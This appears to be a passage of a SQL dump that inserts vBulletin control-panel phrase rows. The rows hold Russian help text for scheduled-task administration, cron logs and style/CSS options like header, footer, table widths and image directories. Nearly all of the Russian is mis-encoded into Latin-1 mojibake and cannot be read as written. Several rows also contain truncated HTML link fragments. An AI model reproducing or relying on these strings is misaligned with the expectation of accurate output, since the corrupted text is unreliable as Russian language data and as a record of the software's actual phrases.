(22116, -1, 'cronadmin_edit_product_text', 'cphelptext', 'Îïðåäåëÿåò êà êîé ïðîäóêò ñâÿçà à ñ äà ÃÃîé çà äà ÷åé. Åñëè âû ÃÃ¥ ñîáèðà åòåñü ñîçäà âà òü êà êîé-òî ìîäóëü äëÿ ôîðóìà , òî ìîæåòå ïðîïóñòèòü ýòîò ïóÃêò.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22117, -1, 'cronadmin_edit_product_title', 'cphelptext', 'Ãðîäóêò', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22118, -1, 'cronadmin_modify_text', 'cphelptext', ' ýòîì îêÃÃ¥ îòîáðà æà åòñÿ ïðåäâà ðèòåëüÃûé ïðîñìîòð âà øèõ çà äà Ãèé, âêëþ÷à ÿ âðåìÿ, êîãäà îÃè çà ïóñêà þòñÿ, âðåìÿ èõ ñëåäóþùåãî çà ïóñêà è îïöèþ, ïîçâîëÿþùóþ çà ïóñòèòü èõ ïðÿìî ñåé÷à ñ. \r\nÊîëîÃêè: \r\nm : (ìèÃóòà ) ýòî ìèÃóòà , â êîòîðóþ çà ïóñêà åòñÿ çà äà Ãèå. Åñëè çäåñü ñòîèò çâåçäî÷êà , çà äà Ãèå çà ïóñêà åòñÿ êà æäóþ ìèÃóòó. \r\nh : (÷à ñ) ýòî ÷à ñ, â êîòîðûé çà ïóñêà åòñÿ çà äà Ãèå. Åñëè çäåñü ñòîèò çâåçäî÷êà , çà äà Ãèå çà ïóñêà åòñÿ êà æäûé ÷à ñ. \r\nD : (÷èñëî) ýòî äåÃü ìåñÿöà (÷èñëî), â êîòîðûé çà ïóñêà åòñÿ çà äà Ãèå. Åñëè çäåñü ñòîèò çâåçäî÷êà , îÃî çà ïóñêà åòñÿ êà æäûé äåÃü. \r\nM : (ìåñÿö) ýòî ìåñÿö ãîäà , â êîòîðûé çà ïóñêà åòñÿ çà äà Ãèå. Åñëè çäåñü ñòîèò çâåçäî÷êà , îÃî çà ïóñêà åòñÿ êà æäûé ìåñÿö. \r\nDoW : (äåÃü Ãåäåëè) ýòî äåÃü Ãåäåëè, â êîòîðûé çà ïóñêà åòñÿ çà äà Ãèå. Åñëè çäåñü ñòîèò çâåçäî÷êà , âûïîëÃÃ¥Ãèå ñîãëà ñîâûâà åòñÿ ñ êîëîÃêîé \"×èñëî\". \r\nÇà ãîëîâîê : ýòî çà ãîëîâîê çà äà Ãèÿ. \r\nÑëåäóþùèé ðà ç : ýòî âðåìÿ, êîãäà çà äà Ãèå áóäåò çà ïóùåÃî â ñëåäóþùèé ðà ç. Âû ìîæåòå çà ïóñòèòü åãî ÃåìåäëåÃÃî, âîñïîëüçîâà âøèñü êÃîïêîé \"Çà ïóñòèòü ñåé÷à ñ\" ñïðà âà . \r\nÓïðà âëåÃèå : ýòî êîëîÃêà ñîäåðæèò âûïà äà þùåå ìåÃþ ñ îïöèÿìè \"Ãåäà êòèðîâà òü\", \"Óäà ëèòü\" è êÃîïêîé \"Çà ïóñòèòü ñåé÷à ñ\" äëÿ ÃåìåäëåÃÃîãî çà ïóñêà çà äà Ãèÿ. \r\n Äëÿ äîáà âëåÃèÿ çà äà Ãèÿ âû ìîæåòå èñïîëüçîâà òü êÃîïêó \"Äîáà âèòü Ãîâîå çà äà Ãèå\" â ÃèæÃåé ÷à ñòè ñòðà Ãèöû.', 'vbulletin', '', 0, ''),
(22119, -1, 'cronadmin_modify_title', 'cphelptext', 'Çà ïëà Ãèðîâà ÃÃûå çà äà ÷è', 'vbulletin', '', 0, ''),
(22120, -1, 'cronadmin_remove_text', 'cphelptext', 'Ãîäòâåðäèòå óäà ëåÃèå ýòîãî çà äà Ãèÿ. Ãà æìèòå êÃîïêó \"Äà \" äëÿ óäà ëåÃèÿ.', 'vbulletin', '', 0, ''),
(22121, -1, 'cronadmin_remove_title', 'cphelptext', 'Óäà ëèòü çà äà Ãèå', 'vbulletin', '', 0, ''),
(22122, -1, 'cronlog_text', 'cphelptext', 'Ñïðà âî÷Ãûå ñòà òüè: \r\nÑòà òèñòèêà \r\nÇà ïèñè äåéñòâèé ïà Ãåëè óïðà âëåÃèÿ \r\nÇà ïèñè äåéñòâèé ìîäåðà òîðîâ \r\nÇà ïèñè âûïîëÃÃ¥Ãèé çà ïëà Ãèðîâà ÃÃûõ çà äà Ãèé \r\nÇà ïèñè âûïîëÃÃ¥Ãèé çà ïëà Ãèðîâà ÃÃûõ çà äà Ãèé: \r\nÇäåñü ñîäåðæà òüñÿ çà ïèñè îáî âñåõ çà ïëà Ãèðîâà ÃÃûõ çà äà Ãèÿõ, êîòîðûå áûëè çà ïóùåÃû ñî âðåìåÃè ïîñëåäÃåãî óäà ëåÃèÿ çà ïèñåé. Ãî ýòèì çà ïèñÿì âû ìîæåòå ïðîêîÃòðîëèðîâà òü çà ïóñê çà äà Ãèé â óñòà ÃîâëåÃÃûé ìîìåÃò âðåìåÃè. Çà ïèñè òà êæå ìîãóò áûòü ïîëåçÃûìè ïðè îòñëåæèâà Ãèè êà êîé-ëèáî îøèáêè.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(22123, -1, 'cronlog_title', 'cphelptext', 'Ñïðà âêà î çà ïèñÿõ âûïîëÃÃ¥Ãèé çà äà Ãèé', 'vbulletin', '', 0, ''),
(22124, -1, 'cronlog_choose_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû âûáèðà åòå îïöèè äëÿ ïðîñìîòðà è óäà ëåÃèÿ çà ïèñåé âûïîëÃÃ¥Ãèé âà øèõ çà äà Ãèé. Îò÷¸ò î äåéñòâèÿõ çà ïèñûâà åòñÿ êà æäûé ðà ç ïðè çà ïóñêå çà ïëà Ãèðîâà ÃÃîãî çà äà Ãèÿ, äëÿ êîòîðîãî âêëþ÷åÃà çà ïèñü äåéñòâèé. Îïöèè îïèñà Ãû Ãèæå.', 'vbulletin', '', 0, ''),
(22125, -1, 'cronlog_choose_title', 'cphelptext', 'Ãðîñìîòð/óäà ëåÃèå çà ïèñåé äåéñòâèé çà ïëà Ãèðîâà ÃÃîãî çà äà Ãèÿ', 'vbulletin', '', 0, ''),
(22126, -1, 'cronlog_choose_perpage_text', 'cphelptext', 'Îïðåäåëÿåò, ñêîëüêî çà ïèñåé äåéñòâèé îòîáðà æà åòñÿ Ãà êà æäîé ñòðà Ãèöå ðåçóëüòà òîâ. ÃÃ¥ äåëà éòå ýòî ÷èñëî ñëèøêîì áîëüøèì, èÃà ÷å âà ø îáîçðåâà òåëü ìîæåò îòðà áîòà òü ÃåêîððåêòÃî.', 'vbulletin', '', 0, ''),
(22127, -1, 'cronlog_choose_perpage_title', 'cphelptext', 'Ãðîñìîòð: çà ïèñåé äåéñòâèé çà ïëà Ãèðîâà ÃÃûõ çà äà ÷ Ãà ñòðà Ãèöó', 'vbulletin', '', 0, ''),
(22128, -1, 'cronlog_choose_varname_text', 'cphelptext', 'Ãðîñìîòð: ïîêà çà òü òîëüêî çà ïèñè, ñîçäà ÃÃûå ... \r\nÅñëè âû õîòèòå âèäåòü çà ïèñè äåéñòâèé, ñîçäà ÃÃûå òîëüêî îïðåäåëåÃÃûì ñêðèïòîì, âûáåðèòå åãî èç ñïèñêà . \r\nÓäà ëåÃèå: óäà ëèòü çà ïèñè, îòÃîñÿùèåñÿ ê äåéñòâèþ \r\nÅñëè âû õîòèòå óäà ëèòü çà äà Ãèÿ, îòÃîñÿùèåñÿ òîëüêî ê îïðåäåëåÃÃîìó ñêðèïòó, âûáåðèòå åãî èç ýòîãî ñïèñêà .', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22129, -1, 'cronlog_choose_varname_title', 'cphelptext', 'Ãðîñìîòð è óäà ëåÃèå', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22130, -1, 'cronlog_choose_orderby_text', 'cphelptext', 'Âûáåðèòå, êà ê âû õîòèòå óïîðÿäî÷èòü ðåçóëüòà òû. ÌîæÃî óïîðÿäî÷èòü ïî Äà òå è ïî Äåéñòâèþ.', 'vbulletin', '', 0, ''),
(22131, -1, 'cronlog_choose_orderby_title', 'cphelptext', 'Ãðîñìîòð: óïîðÿäî÷èòü çà ïèñè äåéñòâèé ïî', 'vbulletin', '', 0, ''),
(22132, -1, 'cronlog_choose_daysprune_text', 'cphelptext', 'Çà ïèñè äåéñòâèé, êîòîðûå õðà Ãÿòñÿ ÃÃ¥ ìåÃüøå ââåä¸ÃÃîãî çäåñü êîëè÷åñòâà äÃåé, áóäóò óäà ëåÃû. Ãî óìîë÷à Ãèþ - 30 äÃåé.', 'vbulletin', '', 0, ''),
(22133, -1, 'cronlog_choose_daysprune_title', 'cphelptext', 'Óäà ëåÃèå: óäà ëèòü çà ïèñè äåéñòâèé ñòà ðøå ÷åì X äÃåé', 'vbulletin', '', 0, ''),
(22134, -1, 'cronlog_prunelog_text', 'cphelptext', 'Âà ì òðåáóåòñÿ ïîäòâåðäèòü óäà ëåÃèå çà ïèñåé äåéñòâèé çà ïëà Ãèðîâà ÃÃûõ çà äà Ãèé. Îòîáðà æà åòñÿ îáùåå ÷èñëî çà ïèñåé, êîòîðûå áóäóò óäà ëåÃû. \r\n Åñëè Ãåò çà ïèñåé, ñîîòâåòñòâóþùèõ âà øåìó êðèòåðèþ óäà ëåÃèÿ, âà ì áóäåò ñîîáùåÃî îá îøèáêå.', 'vbulletin', '', 0, ''),
(22135, -1, 'cronlog_prunelog_title', 'cphelptext', 'Óäà ëåÃèå çà ïèñåé âûïîëÃÃ¥Ãèé çà äà Ãèé', 'vbulletin', '', 0, ''),
(22136, -1, 'cronlog_view_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå îòîáðà æåÃû ðåçóëüòà òû ïîèñêà â çà ïèñÿõ âûïîëÃÃ¥Ãèé çà ïëà Ãèðîâà ÃÃûõ çà äà Ãèé. Ââåðõó ñîäåðæèòñÿ èÃôîðìà öèÿ î òîì, Ãà êà êîé âû ñòðà Ãèöå, îáùåå êîëè÷åñòâî ñòðà Ãèö ðåçóëüòà òîâ è îáùåå êîëè÷åñòâî ðåçóëüòà òîâ. \r\n ÊîëîÃêà ðåçóëüòà òîâ îòîáðà æà åò ðà ñøèðåÃÃóþ èÃôîðìà öèþ î êà æäîé çà ïèñè, åñëè ýòî âîçìîæÃî.', 'vbulletin', '', 0, ''),
(22137, -1, 'cronlog_view_title', 'cphelptext', 'Ãðîñìîòð ðåçóëüòà òîâ ïîèñêà â çà ïèñÿõ âûïîëÃÃ¥Ãèÿ çà äà Ãèÿ', 'vbulletin', '', 0, ''),
(22138, -1, 'css_text', 'cphelptext', 'Ñïðà âî÷Ãûå ñòà òüè: \r\nÑòèëè è øà áëîÃû \r\nÎáùèå øà áëîÃû, ïåðåìåÃÃûå ñòèëÿ è CSS \r\nÇà ìåùà åìûå ïåðåìåÃÃûå \r\nÎáùèå øà áëîÃû: \r\n Øà áëîÃû header, headinclude è footer ñ÷èòà þòñÿ îáùèìè øà áëîÃà ìè ò.ê. îÃè âñòà âëÿþòñÿ â êà æäóþ ñòðà Ãèöó ôîðóìà . \r\n Øà áëîÃû header, headinclude è footer ïðåäñòà âëåÃû ñîîòâåòñòâåÃÃî ïåðåìåÃÃûìè $header, $headinclude è $footer. Ñîäåðæèìîå ýòèõ òðåõ øà áëîÃîâ çà ìåÃÿåòñÿ ýòèìè ïåðåìåÃÃûìè, êîãäà ñòðà Ãèöà ôîðóìà çà ãðóæà åòñÿ. Ñîäåðæèìîå äâóõ phpinclude-øà áëîÃîâ ÃÃ¥ îòîáðà æà åòñÿ Ãà ôîðóìå, Ãî âûïîëÃÿåòñÿ êà ê PHP-êîä. \r\n Øà áëîà header ñîäåðæèò HTML êîä, êîòîðûé ñîñòà âëÿåò âåðõÃþþ ÷à ñòü ñòðà Ãèöû ôîðóìà , âêëþ÷à ÿ èçîáðà æåÃèå \"øà ïêè\" è îòêðûâà þùèå òåãè òà áëèöû, â êîòîðîé îòîáðà æà åòñÿ ñîäåðæèìîå ôîðóìà . \r\n Ñîäåðæèìîå headinclude-øà áëîÃîâ âñòà âëÿåòñÿ âÃóòðè òåãîâ <head></head> Ãà êà æäîé ñòðà Ãèöå ôîðóìà . Çäåñü äîáà âëÿþòñÿ ìåòà -òåãè, òà áëèöû ñòèëåé (css), ñêðèïòû è ò.ä. \r\n Øà áëîà footer ñîäåðæèò HTML êîä, êîòîðûé ñîñòà âëÿåò ÃèæÃþþ ÷à ñòü ñòðà Ãèöû ôîðóìà , âêëþ÷à ÿ çà êðûâà þùèå òåãè òà áëèöû, â êîòîðîé îòîáðà æà åòñÿ ôîðóì. \r\nÃåðåìåÃÃûå ñòèëÿ: \r\n Ãèæå Ãà ýòîé ñòðà Ãèöå ïðåäñòà âëåÃû òà áëèöû ïåðåìåÃÃûõ ñòèëÿ \"Ãà çìåðû è ðà çðåøåÃèÿ\", \"Ãóòè ê èçîáðà æåÃèÿì\" è \"Äðóãîå\". Ãòè îïöèè êîÃòðîëèðóþò ðà çëè÷Ãûå à ñïåêòû ñòèëÿ ñòðà Ãèö ôîðóìà .\r\nÃòè ïåðåìåÃÃûå ñòèëÿ ïîäñòà âëÿþòñÿ â øà áëîÃû êà ê: \r\n$stylevar[var_name] \r\n Êîãäà çà ãðóæà åòñÿ ñòðà Ãèöà ôîðóìà , ýòèì ïåðåìåÃÃûì ñòèëÿ ïðèñâà èâà þòñÿ ñîîòâåòñòâóþùèå èì çÃà ÷åÃèÿ. Ñ ïîìîùüþ ïðåäñòà âëåÃèÿ øèðîêî èñïîëüçóåìûõ ïåðåìåÃÃûõ ñòèëÿ â âèäå ïåðåìåÃÃûõ øà áëîÃîâ, èõ î÷åÃü ëåãêî ïîìåÃÿòü - ïðîñòî ïîìåÃÿòü èõ çÃà ÷åÃèå Ãà ýòîé ñòðà Ãèöå è èçìåÃÃ¥Ãèÿ âñòóïÿò â ñèëó Ãà âñåì ôîðóìå. \r\nCSS: \r\nÄâèæîê ôîðóìà èñïîëüçóåò CSS-êëà ññû äëÿ ðà çëè÷Ãûõ ýëåìåÃòîâ ñòðà Ãèöû. Âñå ýòè ýëåìåÃòû èñïîëüçóþò ðà çëè÷Ãûå CSS-êëà ññû, îïðåäåëåÃÃûå çäåñü. Ñëåäîâà òåëüÃî, âû ìîæåòå ïîìåÃÿòü à òðèáóòû âñåõ ýëåìåÃòîâ ñòðà Ãèöû, èñïîëüçóþùèõ CSS-êëà ññû, ïóòåì ðåäà êòèðîâà Ãèÿ êëà ññîâ Ãà ýòîé ñòðà Ãèöå. Õîðîøèé ñà éò äëÿ èçó÷åÃèÿ CSS - w3.org . \r\n Çà ìåòüòå, Ãåñêîëüêî CSS-à òðèáóòû ÿâëÿþòñÿ öâåòÃûìè ïîëÿìè, èñïîëüçóþùèìè ñòà Ãäà ðòÃûé öâåòîâîé HTML êîä. Âû ìîæåòå, Ãà æà â Ãà îáëà ñòè öâåòà ñïðà âà , ÷òîáû îòêðûòü îêÃî âûáîðà öâåòà , ãäå âû ìîæåòå âèçóà ëüÃî âûáðà òü öâåò, Ãà æà â Ãà Ãåì. Äâèæîê ôîðóìà à âòîìà òè÷åñêè âñòà âèò ñîîòâåòñòâóþùèé öâåòîâîé êîä äëÿ âûáðà ÃÃîãî âà ìè öâåòà . Ìà ëåÃüêà ÿ êÃîïêà ñëåâà îò êÃîïêè \"Çà êðûòü\" ïîçâîëÿåò âà ì ïåðåêëþ÷à òü öâåòîâûå ïà ëèòðû äëÿ ïðåäîñòà âëåÃèÿ áîëüøåãî âûáîðà . Òî÷å÷Ãà ÿ îáëà ñòü â âåðõÃåì ëåâîì óãëó èçîáðà æà åò îòñóòñòâèå öâåòà (ïðîçðà ÷Ãîñòü).', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(22139, -1, 'css_title', 'cphelptext', 'Ñïðà âêà ïî îáùèì øà áëîÃà ì, ïåðåìåÃÃûì ñòèëÿ è CSS', 'vbulletin', '', 0, ''),
(22140, -1, 'css_doedit_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå ðåäà êòèðîâà òü áîëüøîå êîëè÷åñòâî îïöèé ñòèëÿ, âëèÿþùèõ Ãà îòîáðà æåÃèå ôîðóìà . Êà æäîìó ñòèëþ ìîæÃî çà äà òü ñâîé ñîáñòâåÃÃûé Ãà áîð CSS è èçîáðà æåÃèé ïóòåì Ãà ñòðîéêè ðà çëè÷Ãûõ ïóÃêòîâ Ãà ýòîé ñòðà Ãèöå.', 'vbulletin', '', 0, ''),
(22141, -1, 'css_doedit_title', 'cphelptext', 'Ãåäà êòèðîâà Ãèå èçîáðà æåÃèé, øðèôòîâ è äðóãèõ îïöèé ñòèëÿ', 'vbulletin', '', 0, ''),
(22142, -1, 'css_doedit_header_text', 'cphelptext', 'Øà áëîà header ñîäåðæèò HTML êîä, êîòîðûé âñòà âëÿåòñÿ â ñà ìûé âåðõ ñòðà Ãèö âà øåãî ôîðóìà (îà âêëþ÷à åò øà ïêó è îòêðûâà þùèå òåãè òà áëèöû êîÃòåÃòà )', 'vbulletin', 'zCarot', 1169465837, '3.6.5'),
(22143, -1, 'css_doedit_header_title', 'cphelptext', 'Header', 'vbulletin', '', 0, ''),
(22144, -1, 'css_doedit_headinclude_text', 'cphelptext', 'Ñîäåðæèìîå øà áëîÃà headinclude âñòà âëÿåòñÿ âÃóòðü òåãîâ <head></head> êà æäîé ñòðà Ãèöû ôîðóìà . Çäåñü äîáà âëÿþòñÿ ìåòà -òåãè, òà áëèöû ñòèëåé (css), ñêðèïòû è ò.ä.', 'vbulletin', '', 0, ''),
(22145, -1, 'css_doedit_headinclude_title', 'cphelptext', 'Øà áëîà headinclude', 'vbulletin', '', 0, ''),
(22146, -1, 'css_doedit_footer_text', 'cphelptext', 'Øà áëîà footer ñîäåðæèò HTML êîä, êîòîðûé áóäåò âñòà âëåà â ñà ìûé Ãèç ñòðà Ãèö âà øåãî ôîðóìà (îà âêëþ÷à åò çà êðûâà þùèå òåãè òà áëèöû ñîäåðæèìîãî, è âñå, ÷òî Ãèæå Ãåå).', 'vbulletin', '', 0, ''),
(22147, -1, 'css_doedit_footer_title', 'cphelptext', 'Footer', 'vbulletin', '', 0, ''),
(22148, -1, 'css_doedit_outertablewidth_text', 'cphelptext', 'Óñòà Ãîâèòå ðà çìåð â ïèêñåëÿõ èëè ïðîöåÃòÃîå îòÃîøåÃèå. \r\n Ãà ïðèìåð, åñëè âû õîòèòå, ÷òîáû ñîäåðæèìîå ôîðóìà âñåãäà çà ïîëÃÿëî âñå îêÃî âà øåãî îáîçðåâà òåëÿ Ãåçà âèñèìî îò ðà çìåðà îêÃà è ðà çðåøåÃèÿ ýêðà Ãà , òîãäà âà ì ñëåäóåò óñòà Ãîâèòü çäåñü çÃà ÷åÃèå 100% . Ñ äðóãîé ñòîðîÃû, åñëè âû õîòèòå, ÷òîáû ñîäåðæèìîå ôîðóìà ñóùåñòâîâà ëî â ïðåäåëà õ ôèêñèðîâà ÃÃîé îáëà ñòè, òîãäà ââåäèòå çäåñü êîëè÷åñòâî ïèêñåëåé, Ãà ïðèìåð 800 èëè ÃåìÃîãî ìåÃüøå ÿâëÿåòñÿ îïòèìà ëüÃûì âà ðèà Ãòîì äëÿ ðà çðåøåÃèÿ 800x600.', 'vbulletin', '', 0, ''),
(22149, -1, 'css_doedit_outertablewidth_title', 'cphelptext', 'ØèðèÃà ãëà âÃîé òà áëèöû', 'vbulletin', '', 0, ''),
(22150, -1, 'css_doedit_spacersize_text', 'cphelptext', 'Ãà ïðèìåð, Ãà options[forumhome]}.php\" target=\"_blank\">ãëà âÃîé ñòðà Ãèöå ôîðóìà âû îáÃà ðóæèòå èÃòåðâà ë ìåæäó îáëà ñòüþ, ñîäåðæà ùåé âà øè ðà çäåëû, è âÃåøÃåé ãðà Ãèöåé ôîðóìà . Ãòà îïöèÿ êîÃòðîëèðóåò âåëè÷èÃó ýòîãî èÃòåðâà ëà .', 'vbulletin', '', 0, ''),
(22151, -1, 'css_doedit_spacersize_title', 'cphelptext', 'Ãà çìåð ðà çäåëèòåëÿ', 'vbulletin', '', 0, ''),
(22152, -1, 'css_doedit_outerborderwidth_text', 'cphelptext', 'Ãòî øèðèÃà ãëà âÃîé ãðà Ãèöû, â êîòîðîé Ãà õîäÿòñÿ âñå òà áëèöû Ãà ñòðà Ãèöå. Ãòî îïöèÿ ÃÃ¥ èñïîëüçóåòñÿ â âåðñèè 3.õ, åñëè ÃÃ¥ áûëî èìïîðòà ñòèëåé èç 2.õ. \r\n\r\nÃà ïðèìåð, êîëè÷åñòâî ÿ÷ååê - îäèà èç ïóÃêòîâ Ãà âà øåé options[forumhome]}.php\" target=\"_blank\">ãëà âÃîé ñòðà Ãèöå ôîðóìà , êîòîðà ÿ ñîäåðæèò ññûëêó Ãà èìÿ ðà çäåëà è åãî îïèñà Ãèå.', 'vbulletin', '', 0, ''),
(22153, -1, 'css_doedit_outerborderwidth_title', 'cphelptext', 'ÂÃåøÃÿÿ øèðèÃà ãðà Ãèö', 'vbulletin', '', 0, ''),
(22154, -1, 'css_doedit_cellspacing_text', 'cphelptext', 'Ãòî à òðèáóò cellspacing òà áëèö ôîðóìà . Îïöèÿ îïðåäåëÿåò ðà ññòîÿÃèå ìåæäó ÿ÷åéêà ìè òà áëèö ôîðóìà . \r\n Ãðèìåðîì ÿ÷åéêè òà áëèöû ÿâëÿåòñÿ îäÃà èç ðà ìîê ó âà ñ Ãà options[forumhome]}.php\" target=\"_blank\">ãëà âÃîé ñòðà Ãèöå ôîðóìà , êîòîðà ÿ ñîäåðæèò ññûëêó Ãà Ãà çâà Ãèå ôîðóìà .', 'vbulletin', '', 0, ''),
(22155, -1, 'css_doedit_cellspacing_title', 'cphelptext', 'ÇÃà ÷åÃèå cellspacing', 'vbulletin', '', 0, ''),
(22156, -1, 'css_doedit_cellpadding_text', 'cphelptext', 'Ãòî à òðèáóò cellpadding òà áëèö ôîðóìà . Ãòà îïöèÿ îïðåäåëÿåò ðà ññòîÿÃèå ìåæäó ãðà Ãèöåé ÿ÷åéêè òà áëèöû è åå ñîäåðæèìûì. \r\n Ãðèìåðîì ÿ÷åéêè òà áëèöû ÿâëÿåòñÿ îäÃà èç ðà ìîê ó âà ñ Ãà options[forumhome]}.php\" target=\"_blank\">ãëà âÃîé ñòðà Ãèöå ôîðóìà , êîòîðà ÿ ñîäåðæèò ññûëêó Ãà Ãà çâà Ãèå ôîðóìà .', 'vbulletin', '', 0, ''),
(22157, -1, 'css_doedit_cellpadding_title', 'cphelptext', 'ÇÃà ÷åÃèå cellpadding', 'vbulletin', '', 0, ''),
(22158, -1, 'css_doedit_formspacer_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò êîëè÷åñòâî ñâîáîäÃîãî ìåñòà ìåæäó ðà çëè÷Ãûìè ýëåìåÃòà ìè ôîðìû. Õîðîøèìè ïðèìåðà ìè ôîðìû ñ ìÃîæåñòâîì ýëåìåÃòîâ ÿâëÿþòñÿ ôîðìû â òà áëèöå \"ÄîïîëÃèòåëüÃûõ îïöèé\" Ãà ñòðà Ãèöà õ ñîçäà Ãèÿ Ãîâîé òåìû è îòâåòà Ãà ñîîáùåÃèå.', 'vbulletin', '', 0, ''),
(22159, -1, 'css_doedit_formspacer_title', 'cphelptext', 'Ãà çìåð ðà çäåëèòåëÿ ýëåìåÃòîâ ôîðìû', 'vbulletin', '', 0, ''),
(22160, -1, 'css_doedit_formwidth_text', 'cphelptext', 'Ãòà ôóÃêöèÿ îïðåäåëÿåò øèðèÃó áîëüøèÃñòâà ôîðì. Ãðèìåðû ôîðì, Ãà êîòîðûå âëèÿåò ýòà îïöèÿ, âêëþ÷à þò ôîðìû ñïèñêîâ îïðîñîâ è ôîðìó â òà áëèöå \"ÄîïîëÃèòåëüÃûõ îïöèé\" Ãà ñòðà Ãèöå ñîîáùåÃèé. \r\n Ââåäèòå ÷èñëî ïèêñåëåé è ïîñòà âüòå ïîñëå Ãåãî \"px\" (Ãà ïðèìåð, 640px ).', 'vbulletin', '', 0, ''),
(22161, -1, 'css_doedit_formwidth_title', 'cphelptext', 'ØèðèÃà ôîðì', 'vbulletin', '', 0, ''),
(22162, -1, 'css_doedit_formwidth_usercp_text', 'cphelptext', 'Ãòà îïöèÿ ïîçâîëÿåò âà ì óñòà Ãîâèòü øèðèÃó ôîðì â êà áèÃåòå ïîëüçîâà òåëÿ. Õîðîøèì ïðèìåðîì ñòðà Ãèöû ñ ôîðìîé, Ãà êîòîðóþ âëèÿåò ýòà ôóÃêöèÿ, ÿâëÿåòñÿ ñòðà Ãèöà Ãåäà êòèðîâà òü ïðîôèëü . \r\n Ââåäèòå ÷èñëî ïèêñåëåé è ïîñòà âüòå ïîñëå Ãåãî \"px\" (Ãà ïðèìåð, 480px ).', 'vbulletin', '', 0, ''),
(22163, -1, 'css_doedit_formwidth_usercp_title', 'cphelptext', 'ØèðèÃà ôîðìû êà áèÃåòà ', 'vbulletin', '', 0, ''),
(22164, -1, 'css_doedit_messagewidth_text', 'cphelptext', 'Ãòà îïöèÿ óñòà Ãà âëèâà åò øèðèÃó òåêñòîâîãî ïîëÿ, èñïîëüçóåìîãî äëÿ ñîçäà Ãèÿ âñåõ ñîîáùåÃèé. Ãðèìåð òà êîãî òåêñòîâîãî ïîëÿ Ãà õîäèòñÿ Ãà ñòðà Ãèöà õ ñîçäà Ãèÿ Ãîâîé òåìû è îòâåòà Ãà ñîîáùåÃèå. \r\n Ââåäèòå ÷èñëî ïèêñåëåé è ïîñòà âüòå ïîñëå Ãåãî \"px\" (Ãà ïðèìåð, 540px ).', 'vbulletin', '', 0, ''),
(22165, -1, 'css_doedit_messagewidth_title', 'cphelptext', 'ØèðèÃà ïîëÿ ñîîáùåÃèÿ', 'vbulletin', '', 0, ''),
(22166, -1, 'css_doedit_messagewidth_usercp_text', 'cphelptext', 'Ãòà îïöèÿ ïîçâîëÿåò âà ì óñòà Ãîâèòü øèðèÃó îáëà ñòè ñîîáùåÃèÿ â êà áèÃåòå ïîëüçîâà òåëÿ. Ãà ïðèìåð, ôîðìà Îòïðà âèòü ëè÷Ãîå ñîîáùåÃèå (åñëè ó âà ñ âêëþ÷åÃà ñèñòåìà ËÑ). \r\n Ââåäèòå ÷èñëî ïèêñåëåé è ïîñòà âüòå ïîñëå Ãåãî \"px\" (Ãà ïðèìåð, 380px ).', 'vbulletin', '', 0, ''),
(22167, -1, 'css_doedit_messagewidth_usercp_title', 'cphelptext', 'ØèðèÃà îáëà ñòè ñîîáùåÃèÿ êà áèÃåòà ', 'vbulletin', '', 0, ''),
(22168, -1, 'css_doedit_codeblockwidth_text', 'cphelptext', 'Ãòà îïöèÿ ïîçâîëÿåò óñòà Ãà âëèâà òü øèðèÃó ïîëÿ êîäà â ñîîáùåÃèÿõ. ÃŽÃà ÃÃ¥ äîëæÃà ïðåâûøà òü îáùóþ øèðèÃó òà áëèöû ôîðóìà . ×òîáû óâèäåòü ïðèìåð îáëà ñòè êîäà , âû ìîæåòå ñîçäà òü Ãîâóþ òåìó â ðà çäåëå è ïîìåñòèòü â ñîîáùåÃèå ýòî: [code]òåñò[/code]. \r\n Ââåäèòå ÷èñëî ïèêñåëåé è ïîñòà âüòå ïîñëå Ãåãî \"px\" (Ãà ïðèìåð, 640px ).', 'vbulletin', '', 0, ''),
(22169, -1, 'css_doedit_codeblockwidth_title', 'cphelptext', 'ØèðèÃà ïîëÿ êîäà ', 'vbulletin', '', 0, ''),
(22170, -1, 'css_doedit_titleimage_text', 'cphelptext', 'Ââåäèòå èìÿ ôà éëà ñ óêà çà Ãèåì ïóòè îò âà øåé äèðåêòîðèè ôîðóìà . \r\n Ãà ïðèìåð, åñëè âà øå èçîáðà æåÃèå äëÿ \"øà ïêè\" Ãà çûâà åòñÿ titleimage.gif è âû çà ãðóçèëè åãî â äèðåêòîðèþ èçîáðà æåÃèé â âà øåé äèðåêòîðèè ôîðóìà , òî ââåäèòå ýòî: images/titleimage.gif', 'vbulletin', '', 0, ''),
(22171, -1, 'css_doedit_titleimage_title', 'cphelptext', 'Èçîáðà æåÃèå \"øà ïêè\"', 'vbulletin', '', 0, ''),
(22172, -1, 'css_doedit_imgdir_button_text', 'cphelptext', 'Äèðåêòîðèÿ êÃîïîê ñîäåðæèò òà êèå èçîáðà æåÃèÿ êÃîïîê, êà ê \"Ãîâà ÿ òåìà \" è \"Îòâåòèòü\". Ãî ïðè÷èÃÃ¥ òîãî, ÷òî ýòè èçîáðà æåÃèÿ ñîäåðæà ò òåêñò, îðèåÃòèðîâà ÃÃûé Ãà êîÃêðåòÃûé ÿçûê, âû ìîæåòå èçìåÃèòü ýòè Ãà ñòðîéêè â äèñïåò÷åðå ÿçûêîâ. \r\n Ââåäèòå ïóòü ê äèðåêòîðèè îòÃîñèòåëüÃî âà øåé äèðåêòîðèè ôîðóìà (Ãà ïðèìåð, images/buttons ).', 'vbulletin', '', 0, ''),
(22173, -1, 'css_doedit_imgdir_button_title', 'cphelptext', 'Äèðåêòîðèÿ êÃîïîê', 'vbulletin', '', 0, ''),
(22174, -1, 'css_doedit_imgdir_statusicon_text', 'cphelptext', 'Ãòà ïà ïêà ñîäåðæèò âñå èêîÃêè, îòîáðà æà þùèå ñòà òóñ ðà çäåëîâ, òåì, ñîîáùåÃèé è ò.ï. \r\n Ââåäèòå ïóòü ê äèðåêòîðèè îòÃîñèòåëüÃî âà øåé äèðåêòîðèè ôîðóìà (Ãà ïðèìåð, images/statusicon ).', 'vbulletin', '', 0, ''),
